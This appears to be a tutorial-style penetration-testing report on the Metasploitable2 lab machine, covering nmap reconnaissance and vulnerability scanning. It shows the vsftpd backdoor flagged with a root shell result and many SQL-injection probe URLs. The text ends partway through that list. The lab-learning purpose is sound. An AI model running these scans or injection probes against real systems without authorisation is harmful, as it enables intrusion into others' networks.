Vulnerability Assessment & Penetration Testing Report on Metasploitable2

Vapt or Vulnerability Assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, application and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.

Penetration testing (or pentesting) is a simulated cyber attack where professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.

It's like in the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It’s a simulated cyber attack where the pentester or ethical hacker uses the tools and techniques available to malicious hackers.

Life Cycle of Penetration Testing:

1] Reconnaissance

2] Scanning

3] Exploitation

4] Maintaining Access

First, we denotes the work of information gathering before any real attacks are planned (like Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But here we have a know target, a Metasploitable2 machine connected to same network as on us to find the target machine we will run an Nmap scan

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

Here, as you can see above the command line and this is IP range that i writter there because we want to know OS details of every system connected to the network so that we can find our target machine. So first we need to sapearate out the live IP address (livehosts.txt) so we save the above result in a text file and then filter the IP address using the command.

and then see the below comand cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt.

Here, We have filtered the file as well as saved the output in a new file and finally our result is in front of you.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat ip.txt                                              
192.168.43.1
192.168.43.120
192.168.43.152
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

Now what we are doing now!! so, now we have to check which one of them is a metasploitable2 machine so we will run an script which will detect the OS of all the live IP's

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

Our output is here :-)

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat osdetails.txt                                       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
53/tcp open  domain  dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
SF:ulJaiswal\)\n");
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP fingerprint, Host, OS details, MAC address, Network distance etc.

Vulnerability Scanning

In this scanning part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerabilities in the system.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.

The output is here - 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat vuln.txt              
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       https://www.securityfocus.com/bid/48539
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_sslv2-drown: 
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
53/tcp   open  domain
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.43.120:80/dvwa/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
|     Form id: id-bad-cred-tr
|     Form action: index.php?page=register.php
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
|     Form id: iddnslookupform
|     Form action: index.php?page=dns-lookup.php
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
|     Form id: idpollform
|_    Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /tikiwiki/: Tikiwiki
|   /test/: Test page
|   /phpinfo.php: Possible information file
|   /phpMyAdmin/: phpMyAdmin
|   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
|   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
|   /icons/: Potentially interesting folder w/ directory listing
|_  /index/: Potentially interesting folder
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
